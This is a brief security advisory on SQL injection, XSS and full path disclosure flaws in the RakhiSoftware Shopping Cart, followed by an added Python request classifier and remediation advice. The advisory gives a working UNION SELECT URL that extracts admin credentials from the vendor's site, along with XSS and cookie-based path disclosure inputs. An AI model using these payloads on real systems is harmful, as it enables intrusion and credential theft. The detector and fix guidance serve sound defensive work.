Application: RakhiSoftware Shopping Cart
Vendor Name: RakhiSoftware
Vendors Url: http://willscript.com/
Bug Type: RakhiSoftware Shopping Cart (SQL,XSS,FPD) Multiple Vulnerabilities

SQL
category_id
http://willscript.com/rjbike_new/product.php?category_id=1+union%20select%201,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin--&subcategory_id=1

XSS
category_id, subcategory_id
http://willscript.com/rjbike_new/product.php?category_id=>'>&subcategory_id=1
http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=>' >

Full Path Disclosure on every page
Set Cookie: PHPSESSID='

Credits: Charalambous Glafkos
Email: glafkos (at) astalavista (dot) com

___________________________________________
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net

Best Regards,
Charalambous Glafkos ( nowayout )
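
A defender-side check for the three issues listed above, as an added example that is not part of the original advisory or the vendor's code: it flags requests whose category_id or subcategory_id is not a plain integer, and PHPSESSID cookies containing characters PHP does not use in session IDs. The function name, finding labels and sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

NUMERIC_PARAMS = ("category_id", "subcategory_id")
# Characters PHP itself uses in session IDs; PHP warns about anything else,
# and with display_errors on that warning includes the script's full path.
VALID_SESSID = re.compile(r"[A-Za-z0-9,-]{1,256}")
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)


def classify(request_target, cookie_header=""):
    """Return the set of advisory findings that one request matches."""
    findings = set()
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # plain integer ID: nothing to report
            if UNION_SELECT.search(value):
                findings.add("sqli:" + name)
            elif re.search(r"[<>'\"]", value):
                findings.add("xss:" + name)
            else:
                findings.add("non-numeric:" + name)
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == "PHPSESSID" and not VALID_SESSID.fullmatch(value):
            findings.add("fpd:PHPSESSID")
    return findings


# Constructed sample requests (request target, Cookie header); not real traffic.
SAMPLES = [
    ("/rjbike_new/product.php?category_id=1&subcategory_id=1", "PHPSESSID=a1b2c3"),
    ("/rjbike_new/product.php?category_id=1+union%20select%201,2,3--&subcategory_id=1", ""),
    ("/rjbike_new/product.php?category_id=1&subcategory_id=%3E%27%3E", ""),
    ("/rjbike_new/product.php?category_id=1&subcategory_id=1", "lang=en; PHPSESSID='"),
]

if __name__ == "__main__":
    for target, cookie in SAMPLES:
        print(sorted(classify(target, cookie)) or "clean", target)
```

The same conditions describe the fix: cast both IDs to integers before they reach the query or the page, and bind them as query parameters rather than concatenating them. Turning display_errors off keeps a malformed session ID from printing the install path.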